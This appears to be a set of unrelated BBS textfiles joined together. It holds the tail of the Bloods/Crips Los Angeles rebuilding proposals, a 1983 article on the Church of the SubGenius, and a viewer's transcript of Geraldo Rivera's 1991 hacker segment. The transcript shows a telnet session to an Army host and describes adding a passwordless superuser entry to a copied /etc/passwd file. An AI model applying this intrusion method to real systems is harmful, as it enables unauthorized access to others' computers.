
All trees will be properly trimmed and maintained.  We want all
weeded/shrubbed areas to be cleaned up and properly nurtured.  New
trees will be planted to increase the beauty of our neighborhoods.

A special taks force shall be assigned to focus on the clean-up of
all vacant lots and trashed areas throughout the deprived areas.
Proper pest control methods shall be implemented by the city to
reduce the chances of rodent scattering.  The city will declare a
neighborhood clean-up week wherein all residents will be responsible
for their block-a block captain will be assigned to ensure
cooperation.  Residents will clean up the block in unisys [sic].

Cockburns comments: Continue with an education plan that-besides
demanding rehabbing and resupply of schools, a new minimum salary of
$30,000 for teachers and re-elections for the School Board-reflects
the concerns of people who want to learn in dignity:

BLOODS/CRIPS EDUCATIONAL PROPOSAL ($700 MILLION)

All schools shall have new landscaping and more plants and trees
around the schools; completly upgrade the bathrooms, making them
more modern; provide a bathroom monitor to each bathroom which will
provide freshen-up toiletries at a minimum cost to the students...

A provision for accelerated educational learning programs shall be
implemented for the entire Los Angeles Unified School District to
provide aggressive teaching methods and provide a curriculum similar
to non-economically deprived areas.  Tutoring for all
subjects...will be mandatory for all students with sub-level grades.

In these after-school tutorial programs, those students whose grades
are up to par will receive federally funded bonus bonds which will
be applied to their continued education upon graduation from high
school.  They will also receive bonus bonds for extra scholastic
work towards their fellow students...

High achievers in these areas [math and science] shall be granted a
free trip to another country for educational exchange..

The LAUSD will provide up-to-date books to the neglected areas and
enough books to ensure that no student has to share a book with
another...

LAUSD will remove all teachers not planning to further their
education along with teachers who have not proven to have a
passionate concern for the students...All teachers shall be given a
standard competency test to verify they are up-to-date with subjects
and modern teaching methods.  Psychological testing will also be
required for all teachers and educational administrators, including
the Los Angeles School Board, every four years.

All curriculums shall focus on the basics in high school
requirements...inundated with advanced sciences and additional
applied math, English and writing skills.

Busing shall become non-existent in our communities if all of the
above demands are met.

Cockburn's comments:  As part of their human welfare plan, the gangs
propose three new hospitals, forty health care centers, and dental
clinics within ten miles of each community, as well as the
reconstruction of city parks; and then deal with a topic on which
the quackery of the Haves has exceeded all bounds:

BLOODS/CRIPS HUMAN WELFARE PROPOSAL ($1 BILLION)

We demand that welfare be completly removed from our community and
these welfare programs be replaced by state work and product
manufacturing plants that provide the city with certain supplies.
State monies shall only be provided for invalids and the elderly.
The State of California shall provide a child welfare building to
serve as day care centers for single parents...

BLOODS/CRIPS LAW ENFORCEMENT PROGRAM ($6 MILLION)

The Los Angeles communities are demanding that they are policed and
patroled by individuals who live in the community and the commanding
officers be ten-year residents of the community in which they serve.
Former gang members shall be given a chance to be patrol buddies in
assisting in  the protection of the neighborhoods.  These former
gang members will be required to go through police training and must
comply to all of the laws institued by our established authorities.
Uniforms will be issued to each and every member of the "buddy
system", however, no weapons will be issued...Each buddy patrol will
be supplied with a video camera and will tape each event and the
officers handling the police matter.  The buddy patrol will not
interfere with any police matter unless instructed by a commanding
officer.

BLOODS/CRIPS ECONOMIC  DEVELOPMENT PROPOSAL

($20 MILLION) Loans shall be made available by  the federal and
state governments to provide interested minority entrepreneurs
interested in doing business in these deprived areas...
These loans shall not exceed a 4% interest bearing charge a year.
The businessman shall not be required to have security for the
loan, however, the businessman must present at least two years of
business operation and taxes, with a city license before funds will
be allocated...Assistance for business plans shall be made available
by the Small Business Administration...business owners shall be
required to hire 90% of their personnel from within their
community...

IN RETURN FOR THESE DEMANDS THE BLOODS/CRIPS WILL:

1.  Request the drug lords of Los Angeles take their monies and
invest them in business and property in Los Angeles.
2.  Encourage these drug lords to stop the drug traffic and get them
to use the money constructively.  We will match the funds of the
state government appropriations and build building for building.
3.  Additionally, we will match funds for an aids research and
awarness center in South Central and Long Beach and will only hire
minority researchers and physicians to assist in the aids epidemic.

                     GIVE US THE HAMMER AND THE NAILS,
                           WE WILL REBUILD THE CITY.


		The Latest Cult Hero -- Dr. J.R. (Bob) Dobbs

			By Stephen G. Bloom
			Dallas Morning News

   DALLAS -- First there was the Gilgamesh, then the Bible, the Koran, the Book
of Mormon, Dianetics, "I'm OK, You're OK," and now, "The Book of the
SubGenius."

   Or so says Doug Smith (a.k.a.  Ivan Stang) who -- along with three Dallas
friends, Lamont Duvoe (Dr.  X), John Hagen (Satellite Weavers) and Philo
Drummond -- has collected the thoughts of a strange and bizarre messiah, Dr.
J.R.  (Bob) Dobbs.

   Pipe-smoking Dr.  Bob, who bears an uncanny resemblance to both Beaver
Cleaver's father, Ward, and comic strip hero Mark Trail, may or may not exist.
But thatti snot important says Smith, 30.

   "Dr.  Bob is too busy to be interviewed," Smith says defiantly.  "He's off
communing with the elder gods of the universe."

   Dobbs is the leader of a New Wave cult group called the SubGenius, whose
principles first were espoused in a 1978 pamphlet that has become an
underground classic.  The Dallas-based cult's newest offering is the
best-selling "Book of the SubGenius" (MacGraw-Hill, $9.95).

   The transition from pamphlet to a professionally produced book wasn't
anything planned by Smith and the rest of Dobbs' disciples.  Last year,
McGraw-Hill contacted Smith with a book offer after one of its editors had been
slipped the pamphlet at a company picnic.  That, along with news of the
peculiar First World SubGenius Convention actually held at Dealey Plaza on Nov.
22, 1981 was enough for publishers to think money could be made by spreading
Dr.  Bob's gospel.

   Smith hired a Chicago agent he describes as a "very sane, 50-year-old woman
not addicted to drugs or anything," who started a bidding war for the book,
which doubled the hefty advance money.	McGraw-Hill's Tim McGuiness sold the
publishing company's marketing division on the idea of the book.

   "I had this gut feeling it would do well," he says.  "Word-of-mouth
advertising that this was a comic, underground satire has sold the book for us.
Not everyone picks up on the spoof.  It's on a frequency only dogs and select
humans can hear."

   Enough people have bought Bob's 184-page philosophy for MacGraw-Hill to
commission a second printing only five weeks after the book was released --
highly unusual for a first book written by an unknown.

   But then again, Bob and his disciples are not very usual.  One has to have
watched the "Addams Family" to appreciate the strangeness of Dr.  Bob's world
headquarters, Smith's East Dallas home.  Vintage comic books are stacked on a
stand in the living room; posters of Idi Amin and Captain Beefheart decorate
the upstairs; a green and red papier-mache dinosaur decorates the foyer.

   Meanwhile, Smith's wife, Shelby, a petite woman wearing a skimpy purple
bikini, extols the virtues of broccoli to their two young children, who wander
around the house naked.

   Smith, who wrote most of the book and is probably the most knowledgeable of
Dr.  Bob's scribes, graduated 12 years ago from St.  Mark's School, which he
calls "one of the conspiracy's (translation:  establishment's) most important
bastions, composed of twisted and bizarre minds."

   He became an independent film maker in Dallas, doing animated wacko movies.
His most celebrated, shown in art houses throughout the United States:
"Reproduction Cycle," a 15-minute short about sex among microbes on Mars, and
"Let's Visit the World of the Future," an X-rated, punk travelogue.

   By April, 1978, Smith and his cohorts had cooked up the idea of writing
about Dr.  Bob.  As Dallas journalist David Seeley, who has followed the cult's
mysterious exploits since its beginning, has written, "People out there were
watching 'Laverne and Shirley,' reading Reader's Digest and chewing 32 times
before swallowing, and it seemed to Drummond, Smith and Duvoe that they were
the only ones who knew how screwed up the world really was."

   The three began collecting pamphlets from UFO cults, Atlantis aficionados,
John Birch Society chapters, Scientology freaks, white supremacy groups and
Hare Krishna devotees.	"We realized it would be easy to mmx them up in one
pile and come out with something better," Smith says.

   Whether the world was ready or not, Dr.  Bob was introduced through an
appropriately demented, 16-page pamphlet.  His disciples sold the pamphlet for
$1, recommending that converts spread the gospel by leaving it in laundromats
and restrooms.

   But just who is Dr.	J.R.  (Bob) Dobbs, the man with that obnoxiously
self-assured smile?

   Only this much is known:  Bob is about 60 years old.  His father was a Mayan
pharmacist, his mother the relative of an Irish revolutionary.	Bob became a
millionaire at age 6, and while in high school received a degree in law through
a correspondence course.  He did top-secret intelligence work during World War
II, then became an author (his 'Sleeping for Fitness' was a best seller).
Finally, he went into business and became an awning salesman extraordinaire.

   He leads a motley assemblage of family:  wife, Connie (his first-grade
sweetheart), his five sons (Bubba, Bobby Jr., Adam Kadman, Shem and Shaun) and
his daughter (her name has never been released for fear of her being
kidnapped).

   Bob, his disciples say, is everywhere.  "He might be infiltrating the
Austral Plane(CQ) or be on Skid Row giving a bum a haircut or tumbling in bed,
extracting secrets from some conspiracy wench," according to "The Book of the
SubGenius."

   What has garnered such a following for Dr.  Bob is his carefree philosophy,
which is a cross between Alfred E.  Newman's and Ozzy Osbourne's.

   His motto is "Slack off!" which translates to doing what you want to do
whenever you want to do it.  "The world is a turkey," according to "The Book of
the SubGenius," "and Bob gives you the carving knife."

   No religion would be complete without a prescribed death ritual.  Bob's
recommendations are not for the queasy.  "The great honor for any SubGenius is
to have his head mounted on Bob's rumpus room wall, or his skull made into one
of Dobbs' ritual ashtrays.  Give of yourself and you will be assured of special
treatment on The Other Side."

   Interested readers who wish to become Dr.  Bob devotees should know how to
salute fellow parishioners.  Put an index finger to the throat, run it up and
down over the Adam's apple fast and gurgle "EYIYIYI."

   Actual churches of Dr.  Bob followers have been established.  Active
congregations exist in New York, Chicago, San Franccsco, Austin, Minneapolis
and Boston -- but not in Dallas.  "It's too straight a city," says Smith.

   In Berkeley, there is even a weekly Dr.  Bob radio show.  Scribe Smith
estimates about 30,000 followers adhere to the cult.

   Abandoned 1950's motels, gas stations and hamburger stands are recommended
as potential sites of worship.	Typical Dr.  Bob ceremonies start with
congregants screaming at the top of their lungs, followed by a general pelting
of the self-ordained minister with coins.  The donations are not
tax-deductible, however; the SubGenius Foundation is a profit-making business
incorporated within Dallas County.  Even Dr.  Bob's face is protected with a
registered trademark.

   All the writing of "The Book of the SubGenius," as well as most of the
production work, was accomplished at Smith's house.  It took six months to
complete the manuscript for McGraw-Hill.

   The last thing Smith wants is for the cult to be swallowed up by an
egocentric leader.  "If we get too big, were going to have to kill Bob.  I'd
hate to do it.	But he doesn't need the money.  I want it."

----------
Transcribed without permission from The Chapel Hill Newspaper  9/26/83


					Byron Howes
					UNC - Chapel Hill
					duke!unc!bch
==============================================================================
       ___  ___
      (___><___)  .....And if you enjoyed this TextFile, call The Works, 914's
\        _[]_          TextFile BBS:
 \______/    \_____                          The Works
                  _\                         =========
  _______________ \>\     (914)-238-8195 24 Hrs.       900+ Textfiles Online
 /               \   \    300/1200 Baud, N,8,1         Home of Terror Ferret
/                 \___>   10 Megabytes of Storage      ANSI Graphics Optional
==============================================================================
    Transcript of _Now_It_Can_Be_Told_:  "Mad Hackers' Key Party"
              Hosted by Geraldo Rivera  (Sept. 30, 1991)

Geraldo:  I'm Geraldo rivera.  And now, It can be told.

<Flashy intro featuring various bleeps and sounds and what is supposed
to look like a computer screen>

Geraldo:  You're watching life imitate art.

<home video of hackers hacking.  Room is in disarray, with a few
computers scattered around among various wires and cables and
telephones, and other equipment.>

Geraldo:  Exclusive video of teenagers playing a dangerous and
mind-boggling version of War Games.

<video focuses on what appears to be 3 teenagers typing on computer
keyboards.>

<video focuses on one of the screens.>

Geraldo:  If you think it's kid stuff, just watch this.

<screen shows:
|     quit
| 221 Goodbye.
| rugrcx>
|        telnet tracer.army.mil
| Trying 192.33.5.135....
| Connected to tracer.army.mil
| Escape character is '^]'.
|
|
|
| Xenix K3-4 (tracer.army.mil)
|
|
|
| login:
|       dquayle
| Password:_
>
<screams of joy from kids>
<screen shows: Warning (banner)...This terminal is not secure...Do not
process classified information...Protect user IDs, passwords...Control
access to your system....Destroy classified and sensitive
material....>

Geraldo:  Straight into the US Army computer.  In the name of the vice
president!!  Straight out with America-s counter-terrorist strategies
in the Persian Gulf war. <video of bombings during Gulf War.)

Cliff Stoll:  These guys in the army, they didn't do their homework.
They screwed up.  <shows Cliff Stoll sitting in chair, terminal on
behind him.>

Geraldo:  You bet they did.  And they're not the only ones.

<more video of hackers hacking, Emmanuel Goldstein talking on a
telephone>

Geraldo:  Try the Pentagon, NASA, the White House.

<video showing guy next to payphone, Japanese Kanji characters fill
the screen>

Geraldo:  ...the IRS, the Department of Justice, and the stock
exchange.

<Japanese video now shows hacker typing on laptop in front of pay
phone - It is dark out.>

Phiber Optik (guy next to pay phone, typing on laptop):  I find it
very thrilling.  It's quite interesting.

Some guy in a suit speaking in a microphone:  Tomorrow's terrorists
may be able to more damage with a keyboard, than with a bomb.

<more video of a hacker hacking>

Geraldo:  Now it can be told.  A terrifying expose on Malice In
Wonderland.  The Mad Hacker's Key Party.

<screen displays that title over hacker typing on keyboard>
<Intro to the show>

Geraldo:  Welcome everybody.  Up front today, a new kind of warfare.
This kind of combat won't be fought with bombs and bullets, but with
bits and bytes, RAMs, and ROMs.  I'm talking about computer terrorism.
Imagine this nightmare:  Saddam Hussein breaking into our Pentagon
computers.  Well, as your about to see, we have discovered that this
is frightningly possible, given a combination of floppy disks and
sloppy security.  Before you meet a mad hacker, live, right here in
our studio, watch as our correspondant Krista Bradford discovers just
how vulnerable our national defense system really is.

<screen switches to Krista Bradford in corner office, in front of terminal>

Krista:  Thanks Geraldo.  Computers:  they are absolutely essential to
our national defense.  Our military depends on them to win wars and to
save lives.  So you'd think they'd do everything possible to protect
these computers, but, think again.  This exclusive video proves
otherwise.  <she hits play button on VCR, hacker home video pops up
again>

Krista:  This video looks like a home video, but its implications are
astounding.

<video passes over computer (IBM compat.) - notable is an issue of
2600 propped up against the keyboard>

Krista:  These kids are in Amsterdam; they are not the enemy, they are
not spies.  They are computer hackers and they are about to break into
a US Army computer.

Emmanuel:  This is about as blatant a violation as you can possibly
get.
<screen shows Emmanuel Goldstein>

Krista:  Emmanuel Goldstein is the editor of 2600, The Hacker Quarterly.
<screen switches to Emmanuel typing at keyboard, focuses on pile of 2600's
stacked nearby>

<screen switches back to hacker home video, Emmanuel on the phone>

Krista:  He was with the hackers as thy gained unauthorized access to
the Army computer.

<list of *.MIL sites scrolls across a computer screen>

Krista:  Although it wasn't classified, what the hackers found was
alarming.

<long e-mail message scrolls across a screen>

Krista:  A sensitive memo which details a counter-terrorist plan.
<screen shows bomb going off>  The date:  January 15th - Saddam
Hussein's deadline to withdraw his forces from Kuwait.  <more footage
from the Gulf War>

<screen switches to Emmanuel being interviewed again>

Emmanuel:  It was incredible how easy it was.  Because, literally they
picked a machine at random out of a thousand machines that they had a
listing of.  And used various means just to get in.

<screen switches to the screen I typed above, except the first login
is guest [Login incorrect]..Second login, sync, password prompt
appears?

Krista:  In order to get into a computer, you need to be an authorized
user, and have a password.  So the hackers had to create one.  Using a
well-known bug in the system, they managed to copy the password file
and do just that.

<list of /etc/passwd floats by>

Emmanuel:  <sitting at terminal>  The idea was to create a user named
Dan Quayle, and give him superuser privileges, as well he deserves.

Krista:  Now here's the trick:  because they didn't know any
legitimate passwords, they left the space for Dan Quayle's password
blank.

<screen focuses on dquayle record of /etc/passwd, highlights the
colons after 'dquayle'>

Emmanuel:  Everything between those two colon's is the encrypted
password, but there's nothing between those two colons, so there's no
password.

Krista:  Next, the hacker's call back as Dan Quayle, and now they
don't need a password to get in.

<screen shows login as dquayle, null password...Hackers cheer as
WARNING banner and logon screen (summarized above) appears.>

Krista:  At this point, all of about 5 minutes have passed.  A few
seconds later, and they have gained complete control.

Emmanuel:  That means they have access to the entire system, they
control the entire system.  They can take it down, they can change
every file.  They can read anybody's mail.

Krista:  <walking along outside>  So just how serious was this
violation?  Well, the Army, the Justice Department, and the FBI
wouldn't tell us.  They all refused to comment.  But this we do know:
the US Army computer that was accessed was designed for "Authorized
Use By Official Personnel Only".  You wouldn't want just anybody using
this computer, especially during a time of war.

<screen shows jet taking off...screen switches to guy ( Winn Schwartau
[Information Security Consultant])  sitting in front of terminal set
up with some other electronic devices attached.

Winn:  The military knows better.  They should be protective of their
computers a lot better than they are.

<helicopter shown...screen switches to Emmanuel>

Emmanuel:  Obviously, there's a problem.  Obviously people can get
into anything and see anything.

<screen switches to Cliff Stoll>

Cliff:  These guys in the Army, they didn't do their homework.  They
screwed up.

<switches back to video of hackers>

Krista:  They sure did.  This isn't the first time Dutch hackers have
infiltrated government computers.

<video of space shuttle taking off>

Krista:  Just this April, another group made its way into the
computers at NASA, the Pentagon, and other sensitive locations.
<screen shows newspaper headline of said event>.

<screen shows the Pentagon>

Emmanuel:  If our own military doesn't know enough to look for these
bugs and make it hard for people to get into their systems, what can
we say about non-classified computers or computers run by schools and
various other institutions?

<screen zooms in on hardback copy of _The_Cuckoo's_Egg>

Krista:  Cliff Stoll, author of The CUckoo's Egg:  How he tracked down
a hacker selling secrets to the KGB.  Stoll opposes hacking, likening
it to breaking into someone's house.

<screen shows cliff sitting in front of a Mac LC showing familiar
'Flying Toasters'....Cliff appears more sedate than as seen before on
other programs>

Cliff:  Is there good that can come from someone breaking into my
house?  If someone sneaks in through my window over there, comes in
and starts looking at things, is there any good that can come from
that?

<screen switches back to Emmanuel>

Emmanuel <with hand raised, looking mad at Cliff's comment>:  I don't
like that analogy.  Hackers are not interested in personal files of
individual people.  They're interested in huge databases and computer
systems.

<screen switches to Japanese TV, Kanji characters spread all
over...It's night...Guy is standing in front of lighted-up pay phone>

Phiber:  My handle's Phiber Optik.  I'm a computer hacker from the
east coast.

<screen shows Phiber taking acoustic coupler from a bag...[This scene looks
extremely modern-day Cyberpunk-ish]>

Krista:  The Dutch aren't the only ones breaking into US computers.

Phiber:  I find it actually very, very thrilling.  It's quite
interesting.

<screen shows laptop set on some cement stool....Screen moves to show
other people milling around...Gee, is that Mr. Goldstein?!?  And a
g-man looking type in sunglasses [

Krista:  It is nighttime in the meat packing district of New York
City.  A Japanese camera crew is documenting the work of one of
America's most notorious hackers.

<Phiber connects the coupler to the pay phone>

Phiber:  I enjoy this...Just know as much as you can about technology
and about, uh, computer networking.  <he's busy getting the pay phone
set up>

Krista:  They watch him hook up his computer to a payphone, so the
call can't be traced to his home.

Phiber:  <typing on the laptop>  Hacker's goal is basically to become
one with the machine.  [in a Socratic-dialogue tone of
voice]

Krista:  Unlike Holland, hacking in the US is a crime, so this hacker
prefers to remain anonymous.

<screen switches to dark bookstore where A. Hacker [Phiber] sits
across from Krista>

Krista:  So what gives you the right to access other people's
computers?

A. Hacker:  To tell you the truth, I really don't care hat someone
keeps on their computers.  Me, myself personally, and my close friends
are mainly interested in programming the machines.

Krista:  But if the machines are owned by somebody else, they're not
your machines!

A. Hacker:  Well, sure, but we'd just be coexisting with the people
that normally use the machine.

Krista:  Have you ever gotten into the White House computers?

A. Hacker:  Well, I can't personally say whether I have or not.  I
know it's certainly possible, there's nothing stopping anyone from it.

<shot of White House>

Krista:  Did you ever see anything interesting when you were there?

A. Hacker:  Well, I'm not gonna say I was ever there...bu...uhh...No
comment...

<screen switches back to the studio>

Geraldo:  Joining me now is Craig Neidorf. Craig is one of the
country's most notorious hackers.  He has the dubious distinction of
being one of the first people prosecuted under the Computer Abuse and
Fraud Act.  Although the charges against him were eventually dropped.

Geraldo:  Do you think it's fun what the Dutch kids did?  Get any
kicks out of it?

Craig [KL]:  I'm sure they probably thought it was fun.  I was a bit
disturbed by it  when I heard about it.

Geraldo:  Yeah.  And you'll see why, after this.

<cut away to commercial, but first a message from Winn Schwartau and
Geraldo...>

Winn:  We do, potentially face an electronic Pearl Harbor.

<shot of Pearl Harbor>

Geraldo:  Is the United States vulnerable to a computer invasion by
the enemy?  We'll be back in a moment with some of the scenarios for
terror, as we continue our report on the Mad Hacker's Key Party.

<Commercial>

Geraldo:  We'll be hearing more from our hacker friend here in a
moment, as well as from somebody who prosecutes guys just like Craig.

Geraldo:  In their own defense Craig and the other hackers say they
demonstrate graphically just how vulnerable are to sabotage.  Another
word for sabotage in the high-tech 90's is terrorism.  Here's Krista
Bradford with the second part of her alarming report.

Krista:  Thanks Geraldo.  For years the US government has known about
the threat of computer terrorism, but it has done little to protect
itself.  Computer security is routinely cut from the budget.  So now
we are in the precarious position of life possibly imitating art.
That according to a recent Congressional subcommitee, when the
subcomittee roled a clip from the movie Die Hard.

<actually it's Die Hard II...Clip shows scene where head hancho at
Dullus Airport realizes someone else has control of their computer
system>

<scene switches to that Winn guy...An Information Security Consultant>

Winn:  A dedicated, motivated group of individuals with proper funding
and a little bit of knowledge of technology.....

<another clip from Die Hard II...Workers scrambling around the control
tower..Chaos...>

Winn:  ....has the capability to effectively invade the United States
via his computers and communication systems, shut those systems down
that they wish to shut down, and do it invisibly by remote control.

<screen shows plane taking off>

Krista:  The FAA's computerized air traffic control system holds the
lives of tens of thousands of travellers in the balance every second.

<screen shows fictional computer graphic of air traffic over map of
the country>

Krista:  The federal reserve system moves $250 trillion through it's
computer networks every year.  The more computers we have the more
vulnerable we become to computer terrorism.

<shot of terrorists hijacking TWA plane>

Guy in suit in front of microphone:  A recent national research
council report says that the modern thief can steal more with a
computer, than with a gun.  Tomorrow's terrorists may be able to do
more damage with a keyboard, than with a bomb.  That's frightening.

Krista:  Dan Glickman (sp?) sits on the House Science, Space, and
Technology Committee and recently chaired a hearing on computer
security.  Winn Schartau, a leading authority on information security
and author of the novel _Terminal_Compromise_ testified at this
hearing.

Winn:  Terrorism is not necessarily implied by bombs and bullets.  You
can affect massive amounts of people by attacking the right computers.
And that's terrorism.

<switch back to Emmanuel>

Emmanuel:  The computer is a tool.  And any tool can be used as a
weapon.

<switch back to A. Hacker - now we see he's with another person (B.
hacker?)>

A. Hacker:  I wouldn't as much call it a weapon as I would call it an
extension of one's own mind.

<switch back to Winn.  He's setting up some sort of satellite receiver
next to his terminal and equipment>

Krista:  For the first time on television we can see just how
vulnerable computers are to attack.  There are four ways the computer
can be used as a weapon.  Number one, viruses:  programs that copy
themselves over and over again.  In January, there were 480 viruses
In June, 921.  At the current rate there will be 100,000 viruses by
the year 1995.

<shows fictional graphic of computers all over the map of the US,
apparently supposed to be infected>

Winn:  There are a new breed of viruses coming out that actually can
cause physical damage to the computer.  Either cause the monitor
itself to blow up, or cause the hard disk to physically crash, thus
rendering all the information unusable.

Krista:  Number 2, interception.  Terrorists can intercept phone lines
used by computers and faxes.  HIgh-tech phone taps.

<shows fictional graphic of guy at keyboard intercepting signals
transmitted between two computers>

Winn:  There are very, very simple, off-the-shelf, products and
techniques that are available to listen in on all your digital
communications.

Krista:  Number 3, electromagnetic eavesdropping.  Something our own
government has allegedly kept under wraps for 40 years, so it can
protect its military computers while spying on other unprotected
systems.

Winn:  You have to view the computer as a miniature radio transmitter.
All the information that is being processed on it, and is being
displayed on the terminal, your video display terminal, is being
broadcast into the air just like a radio transmitter.

Krista:  In an exclusive demonstration of just how easy it is while
someone is typing at a computer terminal we can see someone up else to
a mile and a half away tune in the radiation with an antenna and read
exactly what is being typed.

<screen shows one person typing in fictional credit card information,
then switches back to Winn's setup, where he tunes in to the frequency
19.9217 and is able to see on his terminal the information that was
being typed on the other terminal>

Krista:  And finally number 4, computer guns.  These guns are not
loaded with bullets but transmit high frequencies or electromagnetic
pulses, which, when fired, can cause an entire computer system to
crash.

<shows fictional graphic of satellite transmitting signal which causes
computer to blow up>

Winn:  What if I shot your computer with my hertz (sp? unclear word)
gun every hour on the hour, forcing your computers down every hour?
It takes approximately a half-hour to forty-five minutes to bring one
back up, how long can your company sustain that before you cry uncle?

<shows hacker home video again>

Krista:  Just how real is the threat of computer terrorism?  Real
enough, according to a GAO report on computer security at the
Department of Justice.  The report identified many disturbing computer
flaws which have life and death implications.

<shows report>

Krista:  Real enough according to another GAO report on computer
security at the stock market.  Six of our nation's stock market
computers are at risk, which handle 1.8 trillion dollars every year.

<shows stock market report>

Krista:  Real enough that according to a report just this September
which revealed that top secret bomb designs for every nuclear weapon
in the country were left unprotected in the computer system at the
Rocky Flats Nuclear Weapons Plant.

Winn:  The current state of affairs is such that we do potentially
face an electronic Pearl Harbor.

<bomb exploding footage>

Krista <in front of statue of statue in Washington, apparently>:  Just
how many acts of computer terrorism there have been is impossible to
say since our own government refuses to comment.  But, the manifesto
for the terrorist group The Red Brigade vows that one of its main
goals is to target and destroy computer systems.

<shot of Die Hard II again., where Bruce Willis says "This is just the
beginning">

<back to the studio...>

Geraldo:  Joining us now via satellite from Oakland, CA is the
Assistant District Attorney Don Ingraham ... for Alameda County and he
has been prosecuting computer hackers for years.

<Don is in the TV box, between Geraldo and Craig [KL]>

Geraldo:  Don, how do you respond to the feeling common among so many
hackers that what they're doing is a public service; they're exposing
the flaws in our security systems?

Don:  Right, and just like the people who rape a coed on campus are
exposing the flaws in our nation's higher education security.  It's
absolute nonsense.  They are doing nothing more than showing off to
each other, and satisfying their own appetite to know something that
is not theirs to know.

Geraldo:  Don, you stand by, Craig as well.  And when we come back
we'll hear more from prosecutor Ingraham and from, I guess his
archrival here, the Mad Hacker Craig Neidorf.

<Commercial>

Geraldo:  We're back with Craig Neidorf, a former University of
Missouri student who ran a widely distributed electronic newsletter
[Phrack, duh] for computer hackers.  He is so proud of being America's
Most Wanted computer hacker that he has put together this very
impressive scrapbook.

<Geraldo holds up a colorful scrapbook..On the left page shows a
lightning bolt hitting what looks to be a crown [Knight Lightning]
...And on the right it looks like a graphic saying "Knight Lightning"
and below that is  a black circle with a white lightning bolt, and
next to that is a triangle that looks very similar to the triangle
with an eye that appeared on the cover of _GURPS_Cyberpunk_ [which
said in it, the book that was seized by the Secret Service! see page
4...- but the one on KL is illegible]>

Geraldo:  Knight Lightning I guess that was your code?

KL:  It was my editor handle.

Geraldo:  That's your handle.  OK.  And from Oakland, CA we are
talking with the Assistant District Attorney Don Ingraham, who is hard
driven, you might say, to put people like Craig behind bars.  Don, do
you think Craig's lucky that he's not behind bars right now?

Don:  Yes, I think he's extraordinarily lucky.  He was part of a
conspiracy, in my opinion, to take property that wasn't his and share
it with others.  They charged him with interstate transport of stolen
property - couldn't make the threshold -and it came out that it had
been compromised by, unfortunately, released by another Bellcore
subsidiary.  But was certainly not through any doing of HIS that he is
a free man.

Geraldo:  So you think that his activities stink, then.

Don:  Absolutely.  No Question about it.

Geraldo:  Craig, you wanna respond?  Are you doing something for the
greater good of society?

KL:  Well I was merely publishing a newsletter.  I  didn't go out and
find this document.  Rather it was sent to me.  In many ways it could
be compared to Daniel Ellsberg sending the Pentagon Papers to the New
York Times.

Geraldo:  Do you figure it that way Don?  Is he like Daniel Ellsberg?

Don:  No, Ellsberg went to court to deal with it.  Daniel Ellsberg's
release of the Pentagon Papers is the subject of a published court
decision to point out it was a matter of national security and
national interest.  The E911 codes, which is the citizen's link to the
police department are not a matter of national security.  They're a
matter of the central service to the community.......

Geraldo:  You broke into the 911 system?  He broke into the 911
system!

KL:  No, that's not correct.  I never entered any 911 telephone
system.

Don:  I didn't say he entered into it.  What I said was that he and
Riggs conspired together to take a code that they knew was necessary
to 911 and to take it apart to see how it worked.  They never had the
owner's permission, they never asked for it.

Geraldo:  Alright, lemme ask you this....

KL:  The court found that there was no conspiracy here.

Geraldo:  You were acquitted.  You were vindicated at least from
criminal responsibility.  Lemme just quickly ask you this:  hackers
have been inside the White House computer.

KL:  Yes they have.

Geraldo:  And they've been inside the Pentagon computer.

KL:  Yes.

Geraldo:  And if Saddam Hussein hired some hackers whether they're
from Holland or any other place, he could've gotten into these
computers, presumably.

KL:  Presumably, he could've.

Geraldo:  And gotten some valuable information.

KL:  It's definitely possible.

Geraldo:  And you still think hackers are performing a public service?

KL:  That's not what I said.  I think that those kind of activities
are wrong.  But by the same token, the teenagers, or some of the
people here that are not performing malicious acts, while they should
be punished should not be published as extreme as the law currently
provides.

Geraldo:  You're response to that Don?

Don:  I don't think they're being punished very much at all.  We're
having trouble even taking away their gear.  I don't know one of them
has done hard time in a prison.  The book, Hafner's book on
_Cyberpunk_, points out that even Mitnick who is a real electronic
Hannibal Lecter ... did not get near any of the punishment that what
he was doing entitled him to.

Geraldo: <laughing>  An electronic Hannibal Lecter.  OK, stand by,
we'll be back with more of this debate in a moment...

<Commercials>

Geraldo:  Back with Craig Neidorf and prosecutor Don Ingraham.  Craig,
do you think hackers are voyeurs or are they potentially terrorists?

KL:  I think they resemble voyeurs more than terrorists.  They are
often times looking at places where they don't belong, but most
hackers do not intend to cause any damage.

Geraldo:  Do you buy that Don?

Don:  If they stopped at voyeurism they would be basically
sociopathic, but not doing near the harm they do now.  But they don't
stop at looking, that's the point.  They take things out and share
them with others, and they are not being accountable and being
responsible as to whom they are sharing this information.  That is the
risk.

Geraldo:  Can they find out my credit rating?  I know that's not a
national security issue, but I'm concerned about it.

Don:  Piece of cake.

Geraldo:  No problem.

Don:  Assuming....

Geraldo:  Go ahead.  Assuming I have a credit rating...hahahah....

Don:  Assume that the credit is not carried by someone who is using
adequate security.

Geraldo:  But you think Craig it's not problem.

KL: I think it's no problem.

Geraldo:  Give me quickly the worst case scenario.  Say Abu Nidal had
you working for him.

KL:  I'm sorry?

Geraldo: Abu Nidal, notorious .....

KL:  As far as your credit rating?

Geraldo:  No, not as far as my credit rating..  The world, national
security.

KL:  Well, hackers have gotten into computer systems owned by the
government before.  At this point they've never acknowledged that it
was anything that was ever classified.  But even some unclassified
information could be used to the detriment of our country.

Geraldo:  Like the counter-terrorist strategy on January 15th, the day
of the deadline expired in the Persian Gulf.

KL: Perhaps if Saddam Hussein had somehow known for sure that we were
going to launch an attack, it might have benefited him in some way,
but I'm really not sure.

Geraldo:  Don, worst case scenario, 30 seconds?

Don:  They wipe out our communications system.  Rather easily done.
Nobody talks to anyone else, nothing moves, patients don't get their
medicine.  We're on our knees.

Geraldo:  What do you think of Craig, quickly, and people like him?

Don:  What do I think of Craig?  I have a lot of respect for Craig, I
think he's probably going to be an outstanding lawyer someday.  But he
is contributing to a disease, and a lack of understanding ethically,
that is causing a lot of trouble.

Geraldo:  One word answer. As the computer proliferate won't hackers
also proliferate?  Won't there be more and more people like you to
deal with?

Knight Lightning:  I think we're seeing a new breed of hacker.  And
some of them will be malicious.

Geraldo:  Some of them will be malicious.  Yes, well, that's it...for
now.  I'm Geraldo Rivera.

                           [End of Program]




If anyone asks, you didn't get this file from...

         E  X  T  R  E  M  E
      ------------+------------      
                 /|\                                                   
                / | \                    Portland Metro All Text BBS   
               /  |  \                                                 
              /   |   \                      14400: 503.775.0374       
             /    |    \                       SysOp: Thing One        
            /     |     \                                              
           /      |      \           
            d r e a m e s


